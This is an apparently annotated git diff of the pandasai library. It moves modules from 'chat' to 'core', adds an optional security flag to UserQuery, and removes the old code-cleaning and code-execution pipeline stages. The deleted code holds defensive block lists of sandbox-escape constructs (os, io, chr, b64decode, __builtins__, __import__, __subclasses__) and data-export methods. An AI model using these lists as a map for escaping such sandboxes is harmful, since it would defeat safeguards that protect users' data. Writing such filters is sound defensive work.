rename from pandasai/chat/code_generation/code_cleaning.py
rename to pandasai/core/code_generation/code_cleaning.py
index 2ba470204..7d288d6c1 100644
--- a/pandasai/chat/code_generation/code_cleaning.py
+++ b/pandasai/core/code_generation/code_cleaning.py
@@ -6,7 +6,7 @@
import astor
from pandasai.agent.state import AgentState
-from pandasai.chat.code_execution.code_executor import CodeExecutor
+from pandasai.core.code_execution.code_executor import CodeExecutor
from pandasai.helpers.path import find_project_root
from pandasai.helpers.sql import extract_table_names
@@ -43,7 +43,7 @@ def _check_imports(self, node: Union[ast.Import, ast.ImportFrom]):
return
whitelisted_libs = (
- WHITELISTED_LIBRARIES + self._config.custom_whitelisted_dependencies
+ WHITELISTED_LIBRARIES + self.context.config.custom_whitelisted_dependencies
)
if library not in whitelisted_libs:
@@ -191,7 +191,7 @@ def extract_fix_dataframe_redeclarations(
if target_names and self.check_is_df_declaration(node):
# Construct dataframe from node
code = "\n".join(code_lines)
- code_executor = CodeExecutor(additional_deps)
+ code_executor = CodeExecutor(self.context.config, additional_deps)
code_executor.add_to_env("dfs", copy.deepcopy(self.context.dfs))
env = code_executor.execute(code)
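`CodeExecutor` now receives the config explicitly rather than relying on ambient state, which is what lets the redeclaration fix above build a security-aware environment. A hedged usage sketch; `config`, `additional_deps`, `dfs`, and `code` are caller-supplied placeholders, and only the argument order is taken from the hunk:

```python
from pandasai.core.code_execution.code_executor import CodeExecutor

code_executor = CodeExecutor(config, additional_deps)  # config is now the first argument
code_executor.add_to_env("dfs", dfs)
env = code_executor.execute(code)  # returns the populated execution environment
```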
diff --git a/pandasai/chat/code_generation/code_security.py b/pandasai/core/code_generation/code_security.py
similarity index 100%
rename from pandasai/chat/code_generation/code_security.py
rename to pandasai/core/code_generation/code_security.py
diff --git a/pandasai/chat/code_generation/code_validation.py b/pandasai/core/code_generation/code_validation.py
similarity index 100%
rename from pandasai/chat/code_generation/code_validation.py
rename to pandasai/core/code_generation/code_validation.py
diff --git a/pandasai/chat/prompts/__init__.py b/pandasai/core/prompts/__init__.py
similarity index 94%
rename from pandasai/chat/prompts/__init__.py
rename to pandasai/core/prompts/__init__.py
index d3e0a1a13..9fcb903a0 100644
--- a/pandasai/chat/prompts/__init__.py
+++ b/pandasai/core/prompts/__init__.py
@@ -1,9 +1,9 @@
from __future__ import annotations
from typing import TYPE_CHECKING
-from pandasai.chat.prompts.correct_execute_sql_query_usage_error_prompt import (
+from pandasai.core.prompts.correct_execute_sql_query_usage_error_prompt import (
CorrectExecuteSQLQueryUsageErrorPrompt,
)
-from pandasai.chat.prompts.correct_output_type_error_prompt import (
+from pandasai.core.prompts.correct_output_type_error_prompt import (
CorrectOutputTypeErrorPrompt,
)
from .generate_python_code_with_sql import GeneratePythonCodeWithSQLPrompt
diff --git a/pandasai/chat/prompts/base.py b/pandasai/core/prompts/base.py
similarity index 100%
rename from pandasai/chat/prompts/base.py
rename to pandasai/core/prompts/base.py
diff --git a/pandasai/chat/prompts/correct_error_prompt.py b/pandasai/core/prompts/correct_error_prompt.py
similarity index 100%
rename from pandasai/chat/prompts/correct_error_prompt.py
rename to pandasai/core/prompts/correct_error_prompt.py
diff --git a/pandasai/chat/prompts/correct_execute_sql_query_usage_error_prompt.py b/pandasai/core/prompts/correct_execute_sql_query_usage_error_prompt.py
similarity index 94%
rename from pandasai/chat/prompts/correct_execute_sql_query_usage_error_prompt.py
rename to pandasai/core/prompts/correct_execute_sql_query_usage_error_prompt.py
index e373fbd17..f5a9b8613 100644
--- a/pandasai/chat/prompts/correct_execute_sql_query_usage_error_prompt.py
+++ b/pandasai/core/prompts/correct_execute_sql_query_usage_error_prompt.py
@@ -1,4 +1,4 @@
-from pandasai.chat.prompts.base import BasePrompt
+from pandasai.core.prompts.base import BasePrompt
class CorrectExecuteSQLQueryUsageErrorPrompt(BasePrompt):
diff --git a/pandasai/chat/prompts/correct_output_type_error_prompt.py b/pandasai/core/prompts/correct_output_type_error_prompt.py
similarity index 100%
rename from pandasai/chat/prompts/correct_output_type_error_prompt.py
rename to pandasai/core/prompts/correct_output_type_error_prompt.py
diff --git a/pandasai/chat/prompts/file_based_prompt.py b/pandasai/core/prompts/file_based_prompt.py
similarity index 100%
rename from pandasai/chat/prompts/file_based_prompt.py
rename to pandasai/core/prompts/file_based_prompt.py
diff --git a/pandasai/chat/prompts/generate_python_code.py b/pandasai/core/prompts/generate_python_code.py
similarity index 100%
rename from pandasai/chat/prompts/generate_python_code.py
rename to pandasai/core/prompts/generate_python_code.py
diff --git a/pandasai/chat/prompts/generate_python_code_with_sql.py b/pandasai/core/prompts/generate_python_code_with_sql.py
similarity index 76%
rename from pandasai/chat/prompts/generate_python_code_with_sql.py
rename to pandasai/core/prompts/generate_python_code_with_sql.py
index 1f39aa962..e90f72d7c 100644
--- a/pandasai/chat/prompts/generate_python_code_with_sql.py
+++ b/pandasai/core/prompts/generate_python_code_with_sql.py
@@ -1,4 +1,4 @@
-from pandasai.chat.prompts.generate_python_code import GeneratePythonCodePrompt
+from pandasai.core.prompts.generate_python_code import GeneratePythonCodePrompt
class GeneratePythonCodeWithSQLPrompt(GeneratePythonCodePrompt):
diff --git a/pandasai/chat/prompts/generate_system_message.py b/pandasai/core/prompts/generate_system_message.py
similarity index 100%
rename from pandasai/chat/prompts/generate_system_message.py
rename to pandasai/core/prompts/generate_system_message.py
diff --git a/pandasai/chat/prompts/templates/correct_error_prompt.tmpl b/pandasai/core/prompts/templates/correct_error_prompt.tmpl
similarity index 100%
rename from pandasai/chat/prompts/templates/correct_error_prompt.tmpl
rename to pandasai/core/prompts/templates/correct_error_prompt.tmpl
diff --git a/pandasai/chat/prompts/templates/correct_execute_sql_query_usage_error_prompt.tmpl b/pandasai/core/prompts/templates/correct_execute_sql_query_usage_error_prompt.tmpl
similarity index 100%
rename from pandasai/chat/prompts/templates/correct_execute_sql_query_usage_error_prompt.tmpl
rename to pandasai/core/prompts/templates/correct_execute_sql_query_usage_error_prompt.tmpl
diff --git a/pandasai/chat/prompts/templates/correct_output_type_error_prompt.tmpl b/pandasai/core/prompts/templates/correct_output_type_error_prompt.tmpl
similarity index 100%
rename from pandasai/chat/prompts/templates/correct_output_type_error_prompt.tmpl
rename to pandasai/core/prompts/templates/correct_output_type_error_prompt.tmpl
diff --git a/pandasai/chat/prompts/templates/generate_python_code.tmpl b/pandasai/core/prompts/templates/generate_python_code.tmpl
similarity index 100%
rename from pandasai/chat/prompts/templates/generate_python_code.tmpl
rename to pandasai/core/prompts/templates/generate_python_code.tmpl
diff --git a/pandasai/chat/prompts/templates/generate_python_code_with_sql.tmpl b/pandasai/core/prompts/templates/generate_python_code_with_sql.tmpl
similarity index 100%
rename from pandasai/chat/prompts/templates/generate_python_code_with_sql.tmpl
rename to pandasai/core/prompts/templates/generate_python_code_with_sql.tmpl
diff --git a/pandasai/chat/prompts/templates/generate_system_message.tmpl b/pandasai/core/prompts/templates/generate_system_message.tmpl
similarity index 100%
rename from pandasai/chat/prompts/templates/generate_system_message.tmpl
rename to pandasai/core/prompts/templates/generate_system_message.tmpl
diff --git a/pandasai/chat/prompts/templates/shared/dataframe.tmpl b/pandasai/core/prompts/templates/shared/dataframe.tmpl
similarity index 100%
rename from pandasai/chat/prompts/templates/shared/dataframe.tmpl
rename to pandasai/core/prompts/templates/shared/dataframe.tmpl
diff --git a/pandasai/chat/prompts/templates/shared/output_type_template.tmpl b/pandasai/core/prompts/templates/shared/output_type_template.tmpl
similarity index 100%
rename from pandasai/chat/prompts/templates/shared/output_type_template.tmpl
rename to pandasai/core/prompts/templates/shared/output_type_template.tmpl
diff --git a/pandasai/chat/prompts/templates/shared/vectordb_docs.tmpl b/pandasai/core/prompts/templates/shared/vectordb_docs.tmpl
similarity index 100%
rename from pandasai/chat/prompts/templates/shared/vectordb_docs.tmpl
rename to pandasai/core/prompts/templates/shared/vectordb_docs.tmpl
diff --git a/pandasai/chat/response/__init__.py b/pandasai/core/response/__init__.py
similarity index 100%
rename from pandasai/chat/response/__init__.py
rename to pandasai/core/response/__init__.py
diff --git a/pandasai/chat/response/base.py b/pandasai/core/response/base.py
similarity index 96%
rename from pandasai/chat/response/base.py
rename to pandasai/core/response/base.py
index 76a26491b..d6232019c 100644
--- a/pandasai/chat/response/base.py
+++ b/pandasai/core/response/base.py
@@ -19,6 +19,8 @@ def _generate_response(self, result: dict):
return DataFrame(result)
elif result["type"] == "plot":
return Chart(result)
+ else:
+ raise InvalidOutputValueMismatch(f"Invalid output type: {result['type']}")
def _validate_response(self, result: dict):
if (
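The added `else` branch closes a silent failure mode in `_generate_response`: an unrecognized `result["type"]` previously fell through and returned `None`. A small illustration of the new behavior; the instance name `parser` is assumed, and `InvalidOutputValueMismatch` is the exception already used elsewhere in this codebase:

```python
from pandasai.exceptions import InvalidOutputValueMismatch

try:
    parser._generate_response({"type": "audio", "value": b"..."})
except InvalidOutputValueMismatch as exc:
    print(exc)  # Invalid output type: audio
```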
diff --git a/pandasai/chat/response/response_types.py b/pandasai/core/response/response_types.py
similarity index 100%
rename from pandasai/chat/response/response_types.py
rename to pandasai/core/response/response_types.py
diff --git a/pandasai/chat/user_query.py b/pandasai/core/user_query.py
similarity index 85%
rename from pandasai/chat/user_query.py
rename to pandasai/core/user_query.py
index 20825f9ae..2dcf3979e 100644
--- a/pandasai/chat/user_query.py
+++ b/pandasai/core/user_query.py
@@ -3,8 +3,10 @@
class UserQuery:
- def __init__(self, user_query: str):
- self._check_malicious_keywords_in_query(user_query)
+ def __init__(self, user_query: str, secure: bool = True):
+ if secure:
+ self._check_malicious_keywords_in_query(user_query)
+
self.value = user_query
def __str__(self):
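`secure` defaults to `True`, so every existing `UserQuery(...)` call site keeps the keyword screening unless a caller opts out explicitly. A minimal sketch, assuming the check raises `MaliciousQueryError` (the exception this patch's tests import for exactly this case) and that the sample string trips it:

```python
from pandasai.core.user_query import UserQuery
from pandasai.exceptions import MaliciousQueryError

try:
    UserQuery("import os; os.remove('data.csv')")  # secure=True by default
except MaliciousQueryError:
    print("query rejected")

raw = UserQuery("import os; os.remove('data.csv')", secure=False)  # check skipped
```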
diff --git a/pandasai/llm/bamboo_llm.py b/pandasai/llm/bamboo_llm.py
index db2420791..0484141e5 100644
--- a/pandasai/llm/bamboo_llm.py
+++ b/pandasai/llm/bamboo_llm.py
@@ -3,7 +3,7 @@
if TYPE_CHECKING:
- from pandasai.chat.prompts.base import BasePrompt
+ from pandasai.core.prompts.base import BasePrompt
from ..helpers.request import Session
from .base import LLM
diff --git a/pandasai/llm/base.py b/pandasai/llm/base.py
index df63c2b27..f65923235 100644
--- a/pandasai/llm/base.py
+++ b/pandasai/llm/base.py
@@ -5,8 +5,8 @@
from abc import abstractmethod
from typing import TYPE_CHECKING, Any, Optional
-from pandasai.chat.prompts.base import BasePrompt
-from pandasai.chat.prompts.generate_system_message import GenerateSystemMessagePrompt
+from pandasai.core.prompts.base import BasePrompt
+from pandasai.core.prompts.generate_system_message import GenerateSystemMessagePrompt
from pandasai.helpers.memory import Memory
from ..exceptions import (
diff --git a/pandasai/llm/fake.py b/pandasai/llm/fake.py
index 84cf47321..abd3c5371 100644
--- a/pandasai/llm/fake.py
+++ b/pandasai/llm/fake.py
@@ -3,7 +3,7 @@
from typing import Optional
from pandasai.agent.state import AgentState
-from pandasai.chat.prompts.base import BasePrompt
+from pandasai.core.prompts.base import BasePrompt
from .base import LLM
diff --git a/pandasai/pipelines/chat/code_cleaning.py b/pandasai/pipelines/chat/code_cleaning.py
deleted file mode 100644
index 5b7dec6f0..000000000
--- a/pandasai/pipelines/chat/code_cleaning.py
+++ /dev/null
@@ -1,611 +0,0 @@
-import ast
-import copy
-import re
-import traceback
-import uuid
-from typing import Any, List, Union
-
-import astor
-from pandasai.helpers.optional import get_environment
-from pandasai.helpers.path import find_project_root
-from pandasai.helpers.sql import extract_table_names
-
-from ...constants import RESTRICTED_LIBS, WHITELISTED_LIBRARIES
-from ...exceptions import (
- BadImportError,
- ExecuteSQLQueryNotUsed,
- MaliciousQueryError,
-)
-from ...helpers.logger import Logger
-from ...helpers.save_chart import add_save_chart
-from ...schemas.df_config import Config
-from ..base_logic_unit import BaseLogicUnit
-from ..logic_unit_output import LogicUnitOutput
-from ..pipeline_context import PipelineContext
-
-
-class CodeExecutionContext:
- def __init__(
- self,
- prompt_id: uuid.UUID,
- ):
- """
- Code Execution Context
- Args:
- prompt_id (uuid.UUID): Prompt ID
- """
- self.prompt_id = prompt_id
-
-
-class FunctionCallVisitor(ast.NodeVisitor):
- """
- Iterate over the code to find function calls
- """
-
- def __init__(self):
- self.function_calls = []
-
- def visit_Call(self, node):
- if isinstance(node.func, ast.Name):
- self.function_calls.append(node.func.id)
- elif isinstance(node.func, ast.Attribute) and isinstance(
- node.func.value, ast.Name
- ):
- self.function_calls.append(f"{node.func.value.id}.{node.func.attr}")
- self.generic_visit(node)
-
-
-class CodeCleaning(BaseLogicUnit):
- """
- Code Cleaning Stage
- """
-
- _dfs: List
- _config: Union[Config, dict]
- _logger: Logger = None
- _additional_dependencies: List[dict] = []
- _current_code_executed: str = None
-
- def __init__(self, on_failure=None, on_retry=None, **kwargs):
- super().__init__(**kwargs)
- self._function_call_visitor = FunctionCallVisitor()
- self.on_failure = on_failure
- self.on_retry = on_retry
-
- def execute(self, input: Any, **kwargs) -> LogicUnitOutput:
- context: PipelineContext = kwargs.get("context")
- self._dfs = context.dfs
- self._config = context.config
- self._logger = kwargs.get("logger")
-
- code_context = CodeExecutionContext(context.get("last_prompt_id"))
- code_to_run = input
- try:
- code_to_run = self.get_code_to_run(input, code_context)
- except Exception as e:
- traceback_errors = traceback.format_exc()
- if self.on_failure:
- self.on_failure(code_to_run, traceback_errors)
- if self.on_retry:
- return self.on_retry(code_to_run, e)
- raise
-
- context.add("additional_dependencies", self._additional_dependencies)
- context.add("current_code_executed", self._current_code_executed)
-
- return LogicUnitOutput(
- code_to_run,
- True,
- "Code Cleaned Successfully",
- )
-
- def _replace_plot_png(self, code):
- """
- Replace plot.png with temp_chart.png
- Args:
- code (str): Python code to execute
- Returns:
- str: Python code with plot.png replaced with temp_chart.png
- """
- return re.sub(r"""(['"])([^'"]*\.png)\1""", r"\1temp_chart.png\1", code)
-
- def get_code_to_run(self, code: str, context: CodeExecutionContext) -> Any:
- if self._config.security in [
- "standard",
- "advanced",
- ] and self._is_malicious_code(code):
- raise MaliciousQueryError(
-                "Code shouldn't use the 'os', 'io', 'chr' or 'b64decode' functions, as this could lead to malicious code execution."
- )
-
- code = self._replace_plot_png(code)
- self._current_code_executed = code
-
- # Add save chart code
- if self._config.save_charts:
- code = add_save_chart(
- code,
- logger=self._logger,
- file_name=str(context.prompt_id),
- save_charts_path_str=self._config.save_charts_path,
- )
- else:
- # Temporarily save generated chart to display
- code = add_save_chart(
- code,
- logger=self._logger,
- file_name="temp_chart",
- save_charts_path_str=f"{find_project_root()}/exports/charts",
- )
-
- # If plt.show is in the code, remove that line
- code = re.sub(r"plt.show\(\)", "", code)
-
- # Reset used skills
- context.skills_manager.used_skills = []
-
- # Get the code to run removing unsafe imports and df overwrites
- code_to_run = self._clean_code(code, context)
-
- self._logger.log(
- f"""
-Code running:
-```
-{code_to_run}
- ```"""
- )
-
- return code_to_run
-
- def _is_malicious_code(self, code) -> bool:
- tree = ast.parse(code)
-
- # Check for private attributes and access of restricted libs
- def check_restricted_access(node):
- """Check if the node accesses restricted modules or private attributes."""
- if isinstance(node, ast.Attribute):
- attr_chain = []
- while isinstance(node, ast.Attribute):
- if node.attr.startswith("_"):
- raise MaliciousQueryError(
- f"Access to private attribute '{node.attr}' is not allowed."
- )
- attr_chain.insert(0, node.attr)
- node = node.value
- if isinstance(node, ast.Name):
- attr_chain.insert(0, node.id)
- if any(module in RESTRICTED_LIBS for module in attr_chain):
- raise MaliciousQueryError(
- f"Restricted access detected in attribute chain: {'.'.join(attr_chain)}"
- )
-
- elif isinstance(node, ast.Subscript) and isinstance(
- node.value, ast.Attribute
- ):
- check_restricted_access(node.value)
-
- for node in ast.walk(tree):
- # Check 'import ...' statements
- if isinstance(node, ast.Import):
- for alias in node.names:
- sub_module_names = alias.name.split(".")
- if any(module in RESTRICTED_LIBS for module in sub_module_names):
- raise MaliciousQueryError(
- f"Restricted library import detected: {alias.name}"
- )
-
- # Check 'from ... import ...' statements
- elif isinstance(node, ast.ImportFrom):
- sub_module_names = node.module.split(".")
- if any(module in RESTRICTED_LIBS for module in sub_module_names):
- raise MaliciousQueryError(
- f"Restricted library import detected: {node.module}"
- )
- if any(alias.name in RESTRICTED_LIBS for alias in node.names):
- raise MaliciousQueryError(
- "Restricted library import detected in 'from ... import ...'"
- )
-
- # Check attribute access for restricted libraries
- elif isinstance(node, (ast.Attribute, ast.Subscript)):
- check_restricted_access(node)
-
- dangerous_modules = [
- " os",
- " io",
- ".os",
- ".io",
- "'os'",
- "'io'",
- '"os"',
- '"io"',
- "chr(",
- "chr)",
- "chr ",
- "(chr",
- "b64decode",
- ]
-
- return any(
- re.search(r"\b" + re.escape(module) + r"\b", code)
- for module in dangerous_modules
- )
-
- def _is_jailbreak(self, node: ast.stmt) -> bool:
- """
-        Check whether the node contains jailbreak constructs, to prevent malicious code execution.
- Args:
- node (ast.stmt): A code node to be checked.
- Returns (bool):
- """
-
- DANGEROUS_BUILTINS = ["__subclasses__", "__builtins__", "__import__"]
-
- node_str = ast.dump(node)
-
- return any(builtin in node_str for builtin in DANGEROUS_BUILTINS)
-
- def _is_unsafe(self, node: ast.stmt) -> bool:
- """
-        Check whether the node contains unsafe operations (e.g. dataframe exports), to prevent malicious code execution.
-
- Args:
- node (ast.stmt): A code node to be checked.
-
- Returns (bool):
- """
-
- code = astor.to_source(node)
- return any(
- (
- method in code
- for method in [
- ".to_csv",
- ".to_excel",
- ".to_json",
- ".to_sql",
- ".to_feather",
- ".to_hdf",
- ".to_parquet",
- ".to_pickle",
- ".to_gbq",
- ".to_stata",
- ".to_records",
- ".to_latex",
- ".to_html",
- ".to_markdown",
- ".to_clipboard",
- ]
- )
- )
-
- def find_function_calls(self, node: ast.AST):
- if isinstance(node, ast.Call):
- if isinstance(node.func, ast.Name):
- self._function_call_visitor.function_calls.append(node.func.id)
- elif isinstance(node.func, ast.Attribute) and isinstance(
- node.func.value, ast.Name
- ):
- self._function_call_visitor.function_calls.append(
- f"{node.func.value.id}.{node.func.attr}"
- )
-
- for child_node in ast.iter_child_nodes(node):
- self.find_function_calls(child_node)
-
- def check_direct_sql_func_def_exists(self, node: ast.AST):
- return (
- self._config.direct_sql
- and isinstance(node, ast.FunctionDef)
- and node.name == "execute_sql_query"
- )
-
- def _replace_table_names(
- self, sql_query: str, table_names: list, allowed_table_names: list
- ):
- regex_patterns = {
- table_name: re.compile(r"\b" + re.escape(table_name) + r"\b")
- for table_name in table_names
- }
- for table_name in table_names:
- if table_name in allowed_table_names.keys():
- quoted_table_name = allowed_table_names[table_name]
- sql_query = regex_patterns[table_name].sub(quoted_table_name, sql_query)
- else:
- raise MaliciousQueryError(
- f"Query uses unauthorized table: {table_name}."
- )
-
- return sql_query
-
- def _clean_sql_query(self, sql_query: str) -> str:
- """
-        Clean the SQL query: trim the trailing semicolon and make table names case-sensitive
- Args:
- sql_query (str): sql query
-
- Returns:
- str: updated sql query
- """
- sql_query = sql_query.rstrip(";")
- table_names = extract_table_names(sql_query)
- allowed_table_names = {df.name: df.name for df in self._dfs} | {
- f'"{df.name}"': df.name for df in self._dfs
- }
- print(allowed_table_names)
- return self._replace_table_names(sql_query, table_names, allowed_table_names)
-
- def _validate_and_make_table_name_case_sensitive(self, node: ast.Assign):
- """
-        Validates that the table exists in the specified dataset and converts its name to the case-sensitive form
- Args:
- node (ast.Assign): code tree node
-
- Returns:
- node: return updated or same node
- """
- if isinstance(node, ast.Assign):
- # Check if the assigned value is a string constant and the target is 'sql_query'
- if (
- isinstance(node.value, ast.Constant)
- and isinstance(node.value.value, str)
- and isinstance(node.targets[0], ast.Name)
- and node.targets[0].id in ["sql_query", "query"]
- ):
- sql_query = node.value.value
- sql_query = self._clean_sql_query(sql_query)
- node.value.value = sql_query
- elif (
- isinstance(node.value, ast.Call)
- and isinstance(node.value.func, ast.Name)
- and node.value.func.id == "execute_sql_query"
- and len(node.value.args) == 1
- and isinstance(node.value.args[0], ast.Constant)
- and isinstance(node.value.args[0].value, str)
- ):
- sql_query = node.value.args[0].value
- sql_query = self._clean_sql_query(sql_query)
- node.value.args[0].value = sql_query
-
- elif isinstance(node, ast.Expr) and isinstance(node.value, ast.Call):
- # Check if the function call is to 'execute_sql_query' and has a string constant argument
- if (
- isinstance(node.value.func, ast.Name)
- and node.value.func.id == "execute_sql_query"
- and len(node.value.args) == 1
- and isinstance(node.value.args[0], ast.Constant)
- and isinstance(node.value.args[0].value, str)
- ):
- sql_query = node.value.args[0].value
- sql_query = self._clean_sql_query(sql_query)
- node.value.args[0].value = sql_query
-
- return node
-
- def _get_target_names(self, targets):
- target_names = []
- is_slice = False
-
- for target in targets:
- if isinstance(target, ast.Name) or (
- isinstance(target, ast.Subscript) and isinstance(target.value, ast.Name)
- ):
- target_names.append(
- target.id if isinstance(target, ast.Name) else target.value.id
- )
- is_slice = isinstance(target, ast.Subscript)
-
- return target_names, is_slice, target
-
- def _check_is_df_declaration(self, node: ast.AST):
- value = node.value
- return (
- isinstance(value, ast.Call)
- and isinstance(value.func, ast.Attribute)
- and isinstance(value.func.value, ast.Name)
- and hasattr(value.func.value, "id")
- and value.func.value.id == "pd"
- and value.func.attr == "DataFrame"
- )
-
- def _get_originals(self, dfs):
- """
- Get original dfs
-
- Args:
- dfs (list): List of dfs
-
- Returns:
- list: List of dfs
- """
- original_dfs = []
- for df in dfs:
- # TODO - Check why this None check is there
- if df is None:
- original_dfs.append(None)
- continue
- original_dfs.append(df.head())
-
- return original_dfs
-
- def _extract_fix_dataframe_redeclarations(
- self, node: ast.AST, code_lines: list[str]
- ) -> ast.AST:
- """
-        Checks for dataframe redeclaration in the code, like pd.DataFrame({...})
- Args:
- node (ast.AST): Code Node
- code_lines (list[str]): List of code str line by line
-
- Returns:
- ast.AST: Updated Ast Node fixing redeclaration
- """
- if isinstance(node, ast.Assign):
- target_names, is_slice, target = self._get_target_names(node.targets)
-
- if target_names and self._check_is_df_declaration(node):
- # Construct dataframe from node
- code = "\n".join(code_lines)
- env = get_environment(
- self._additional_dependencies,
- secure=self._config.security in ["standard", "advanced"],
- )
- env["dfs"] = copy.deepcopy(self._get_originals(self._dfs))
- exec(code, env)
-
- df_generated = (
- env[target_names[0]][target.slice.value]
- if is_slice
- else env[target_names[0]]
- )
-
- # check if exists in provided dfs
- for index, df in enumerate(self._dfs):
- head = df.get_head()
- if head.shape == df_generated.shape and head.columns.equals(
- df_generated.columns
- ):
- target_var = (
- ast.Subscript(
- value=ast.Name(id=target_names[0], ctx=ast.Load()),
- slice=target.slice,
- ctx=ast.Store(),
- )
- if is_slice
- else ast.Name(id=target_names[0], ctx=ast.Store())
- )
- return ast.Assign(
- targets=[target_var],
- value=ast.Subscript(
- value=ast.Name(id="dfs", ctx=ast.Load()),
- slice=ast.Index(value=ast.Num(n=index)),
- ctx=ast.Load(),
- ),
- )
- return None
-
- def _clean_code(self, code: str, context: CodeExecutionContext) -> str:
- """
- A method to clean the code to prevent malicious code execution.
-
- Args:
-            code (str): A Python code string.
-
- Returns:
- str: A clean code string.
-
- """
-
- # Clear recent optional dependencies
- self._additional_dependencies = []
-
- clean_code_lines = []
-
- tree = ast.parse(code)
-
- # Check for imports and the node where analyze_data is defined
- new_body = []
- execute_sql_query_used = False
-
- # find function calls
- self._function_call_visitor.visit(tree)
-
- for node in tree.body:
- if isinstance(node, (ast.Import, ast.ImportFrom)):
- self._check_imports(node)
- continue
-
- if (
- self._is_df_overwrite(node)
- or self._is_jailbreak(node)
- or self._is_unsafe(node)
- ):
- continue
-
- # if generated code contain execute_sql_query def remove it
- # function already defined
- if self.check_direct_sql_func_def_exists(node):
- continue
-
- # if generated code contain execute_sql_query usage
- if (
- self._config.direct_sql
- and "execute_sql_query" in self._function_call_visitor.function_calls
- ):
- execute_sql_query_used = True
-
- # Sanity for sql query the code should only use allowed tables
- if self._config.direct_sql:
- node = self._validate_and_make_table_name_case_sensitive(node)
-
- self.find_function_calls(node)
-
- clean_code_lines.append(astor.to_source(node))
-
- new_body.append(
- self._extract_fix_dataframe_redeclarations(node, clean_code_lines)
- or node
- )
-
- # Enforcing use of execute_sql_query via Error Prompt Pipeline
- if self._config.direct_sql and not execute_sql_query_used:
- raise ExecuteSQLQueryNotUsed(
-                "With direct_sql set to true, the execute_sql_query function must be used. Generating error prompt."
- )
-
- new_tree = ast.Module(body=new_body)
- return astor.to_source(new_tree, pretty_source=lambda x: "".join(x)).strip()
-
- def _is_df_overwrite(self, node: ast.stmt) -> bool:
- """
-        Check whether the node overwrites the `dfs` variable, to prevent malicious code execution.
-
- Args:
- node (ast.stmt): A code node to be checked.
-
- Returns (bool):
-
- """
-
- return (
- isinstance(node, ast.Assign)
- and isinstance(node.targets[0], ast.Name)
- and node.targets[0].id == "dfs"
- )
-
- def _check_imports(self, node: Union[ast.Import, ast.ImportFrom]):
- """
- Add whitelisted imports to _additional_dependencies.
-
- Args:
- node (object): ast.Import or ast.ImportFrom
-
- Raises:
- BadImportError: If the import is not whitelisted
-
- """
- module = node.names[0].name if isinstance(node, ast.Import) else node.module
- library = module.split(".")[0]
-
- if library == "pandas":
- return
-
- whitelisted_libs = (
- WHITELISTED_LIBRARIES + self._config.custom_whitelisted_dependencies
- )
-
- if library not in whitelisted_libs:
- raise BadImportError(
- f"The library '{library}' is not in the list of whitelisted libraries. "
- "To learn how to whitelist custom dependencies, visit: "
- "https://docs.pandas-ai.com/custom-whitelisted-dependencies#custom-whitelisted-dependencies"
- )
-
- for alias in node.names:
- self._additional_dependencies.append(
- {
- "module": module,
- "name": alias.name,
- "alias": alias.asname or alias.name,
- }
- )
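The import policy of this deleted pipeline stage survives in the new `CodeCleaner` (`_check_imports` in `pandasai/core/code_generation/code_cleaning.py`, patched above). A self-contained sketch of the whitelist walk it performs; the toy `WHITELIST` stands in for `WHITELISTED_LIBRARIES`:

```python
import ast

WHITELIST = {"pandas", "numpy", "matplotlib"}  # stand-in for WHITELISTED_LIBRARIES

def check_imports(code: str) -> None:
    """Raise if the code imports a library outside the whitelist."""
    for node in ast.walk(ast.parse(code)):
        if isinstance(node, (ast.Import, ast.ImportFrom)):
            module = node.names[0].name if isinstance(node, ast.Import) else node.module
            library = module.split(".")[0]
            if library not in WHITELIST:
                raise ImportError(f"The library '{library}' is not whitelisted")

check_imports("import numpy as np")   # passes silently
# check_imports("import subprocess")  # would raise ImportError
```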
diff --git a/pandasai/pipelines/chat/code_execution.py b/pandasai/pipelines/chat/code_execution.py
deleted file mode 100644
index 1f6120f98..000000000
--- a/pandasai/pipelines/chat/code_execution.py
+++ /dev/null
@@ -1,316 +0,0 @@
-import ast
-import logging
-import traceback
-from typing import Any, Callable, Generator, List, Union
-
-from pandasai.exceptions import InvalidLLMOutputType, InvalidOutputValueMismatch
-from pandasai.pipelines.logic_unit_output import LogicUnitOutput
-from pandasai.responses.response_serializer import ResponseSerializer
-
-from ...exceptions import NoResultFoundError
-from ...helpers.logger import Logger
-from ...helpers.optional import get_environment
-from ...helpers.output_validator import OutputValidator
-from ...schemas.df_config import Config
-from ..base_logic_unit import BaseLogicUnit
-from ..pipeline_context import PipelineContext
-from .code_cleaning import CodeExecutionContext
-
-
-class CodeExecution(BaseLogicUnit):
- """
- Code Execution Stage
- """
-
- _dfs: List
- _config: Union[Config, dict]
- _additional_dependencies: List[dict] = []
- _current_code_executed: str = None
- _retry_if_fail: bool = False
- _ast_comparator_map: dict = {
- ast.Eq: "=",
- ast.NotEq: "!=",
- ast.Lt: "<",
- ast.LtE: "<=",
- ast.Gt: ">",
- ast.GtE: ">=",
- ast.Is: "is",
- ast.IsNot: "is not",
- ast.In: "in",
- ast.NotIn: "not in",
- }
-
- def __init__(
- self,
- on_failure: Callable[[str, Exception], None] = None,
- on_retry: Callable[[str, Exception], None] = None,
- **kwargs,
- ):
- super().__init__(**kwargs)
- self.on_failure = on_failure
- self.on_retry = on_retry
-
- def execute(self, input: Any, **kwargs) -> Any:
- """
-        This method returns output according to the
-        implementation.
-
- :param input: Your input data.
- :param kwargs: A dictionary of keyword arguments.
- - 'logger' (any): The logger for logging.
- - 'config' (Config): Global configurations for the test
- - 'context' (any): The execution context.
-
- :return: The result of the execution.
- """
- self.context: PipelineContext = kwargs.get("context")
- self._dfs = self.context.dfs
- self._config = self.context.config
- self._additional_dependencies = self.context.get("additional_dependencies", [])
- self._current_code_executed = self.context.get("current_code_executed")
- self.logger: Logger = kwargs.get("logger")
-
- # Execute the code
- code_context = CodeExecutionContext(self.context.get("last_prompt_id"))
-
- retry_count = 0
- code_to_run = input
- result = None
- while retry_count <= self.context.config.max_retries:
- try:
- result = self.execute_code(code_to_run, code_context)
- if self.context.get("output_type") != "" and (
- output_helper := self.context.get("output_type")
- ):
- (validation_ok, validation_errors) = OutputValidator.validate(
- output_helper, result
- )
-
- if not validation_ok:
- raise InvalidLLMOutputType(validation_errors)
-
- if not OutputValidator.validate_result(result):
- raise InvalidOutputValueMismatch(
- f'Value type {type(result["value"])} must match with type {result["type"]}'
- )
-
- break
-
- except Exception as e:
- traceback_errors = traceback.format_exc()
- self.logger.log(f"Failed with error: {traceback_errors}", logging.ERROR)
- if self.on_failure:
- self.on_failure(code_to_run, traceback_errors)
-
- if (
- not self.context.config.use_error_correction_framework
- or retry_count >= self.context.config.max_retries
- ):
- raise e
-
- retry_count += 1
-
- self.logger.log(
-                f"Failed to execute code, retrying with the error-correction framework "
